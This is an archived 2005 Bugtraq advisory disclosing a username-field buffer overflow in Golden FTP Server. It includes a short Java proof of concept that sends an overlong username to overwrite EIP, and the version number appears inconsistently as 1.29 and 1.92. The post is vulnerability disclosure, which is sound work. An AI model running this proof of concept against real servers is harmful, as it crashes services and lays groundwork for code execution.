lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 2 Mar 2005 11:44:51 -0300
From: Carlos Ulver <carlos.ulver@...il.com>
To: bugtraq@...urityfocus.com, vuln-dev@...urityfocus.com
Subject: Golden Ftp server 1.29 Username remote Buffer Overflow


Golden Ftp Server Username Remote Buffer Overflow 

Date:03/01/2005

Version: Golden Ftp Server 1.92 

(Until 01/03/2005 it can be downloaded from
http://www.goldenftpserver.com/golden-ftp-server.zip
SHA-1 Hash of the ZIP file: 9F98D73C46E0F17EF31096F9441B9A9E8ED40CF3 
)

Vendor Description:

Golden FTP Server is extremely easy to use personal FTP server for  
Windows and can be run by any person who has the most basic computer skills.
http://www.goldenftpserver.com/



Flaw Description:

Golden FTP server suffers from a Buffer Overflow when more than 284
characters is entered in the Username field
at logon.

As EIP can be overwritten, it is possible to execute arbitrary code in
systems running this version of the daemon.


Proof of Concept:

I´m providing just a simple proof of concept for this flaw.

The Poc is also avaliable at www.debarry2.com.br/carlos

======begin code=======

/* Carlos Ulver at gmail.com
 * www.debarry2.com.br/carlos
 * 03/01/05 
 * Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer Overflow
 * This is only a proof of Concept.
 * This Ftpd was running in windows xp sp1 Portuguese(Brazilian)
 * 
 */
import java.net.URL;
public class Pocgftpd {
	
	
	public static void main(String[] args) {
		String A = new String();
		
		for(int i=0;i<281;i++) A+='a';
		for (int i = 0; i < 4; i++) A+='b';

	try{
		//This 'a' for password means nothing...only to complete: user:pass@...t
		URL u = new URL("ftp://"+A+":a@....0.0.1");
		u.openStream();
		}catch(Exception E1){}
		
	}
}


======end   code=======

Correction: For correction, please get a newer version of the FTPD.

For more details and updates and flaws please visit:
http://www.debarry2.com.br/carlos



-- 
Carlos A. Ulver.
Home: www.debarry2.com.br/carlos
PGP: www.debarry2.com.br/carlos/contato.htm

Brasil - MG

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ